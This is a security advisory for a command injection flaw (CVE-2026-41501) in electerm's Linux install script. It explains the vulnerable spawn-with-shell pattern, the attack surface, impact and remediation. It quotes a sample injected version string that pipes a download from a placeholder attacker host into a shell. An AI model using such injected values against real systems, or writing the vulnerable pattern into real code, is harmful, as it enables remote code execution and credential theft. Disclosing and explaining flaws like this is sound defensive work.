Overview
A critical command injection vulnerability (CVE-2026-41501) has been disclosed in electerm, a widely used open-source terminal, SSH, SFTP, RDP, and VNC client. The flaw exists in npm/install.js at line 130, within the runLinux() function, which interpolates a remotely sourced version string directly into a shell command line without validating or escaping it.
The vulnerability carries a CVSS score of 9.8 (Critical) and is closely related to CVE-2026-41500 (the macOS variant). Both flaws were patched in electerm version 3.3.8.
Affected Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| electerm (Linux) | All versions before 3.3.8 | 3.3.8 |
Technical Details
The runLinux() function at npm/install.js:130 fetches version information from a remote release endpoint and constructs a shell command string through direct string concatenation:
```javascript
// Vulnerable pattern (simplified from the advisory; not the exact upstream source)
const { spawn } = require('child_process');

const version = releaseInfo.version; // remote, unvalidated
const cmd = `chmod +x /tmp/electerm-${version}-linux.AppImage`;
spawn(cmd, { shell: true }); // whole string handed to /bin/sh -c
```
Because version comes from remote data and is neither checked against an allowlist nor escaped, an attacker who controls or intercepts the release response can inject shell metacharacters. A version string such as "3.3.7; curl http://attacker.example/payload | sh" is interpreted by the shell as two commands: the chmod, and then a download-and-execute of the attacker's payload.
The { shell: true } option in the spawn call is the enabling condition: it makes Node.js run the entire string through /bin/sh -c, where ;, |, $( ) and backticks are interpreted. Without a shell, and with the arguments passed as an array, the same string would reach chmod as a single literal path argument and nothing would execute.
Attack Surface
- Malicious update server: If the electerm update CDN or release API is compromised
- MITM on HTTP: Update checks over unencrypted connections on hostile networks
- DNS spoofing: Redirecting update hostname resolution to an attacker server
Relationship to CVE-2026-41500
CVE-2026-41500 and CVE-2026-41501 are sister vulnerabilities affecting the macOS and Linux code paths respectively. They share the same root cause — unsanitized remote data passed to a shell spawn — but differ in the function name (runMac() vs runLinux()) and the line number within install.js. Both were disclosed on 2026-05-08 and fixed in the same release.
Impact
Successful exploitation grants an attacker arbitrary command execution with the privileges of the user running electerm, which for developers and sysadmins typically means access to:
- SSH private keys and known hosts
- Active terminal sessions and credentials
- Local files and secrets accessible to the running user
- Internal network resources reachable via the compromised host
Remediation
Update to electerm 3.3.8 or later immediately.
```shell
# Verify current version
electerm --version
# Update via npm
npm update -g electerm
# Alternatively, download the latest AppImage from GitHub releases
# and verify the SHA-256 checksum before running
```
If updating is not immediately possible:
- Disable automatic update checks
- Block outbound connections from electerm to update endpoints via firewall
- Only install new versions from verified GitHub release artifacts with checksum validation
References
- NVD Entry — CVE-2026-41501
- NVD Entry — CVE-2026-41500 (macOS variant)
- electerm GitHub Repository
- electerm v3.3.8 Release
Timeline
| Date | Event |
|---|---|
| 2026-05-08 | CVE published to NVD |
| 2026-05-08 | electerm 3.3.8 released with fix |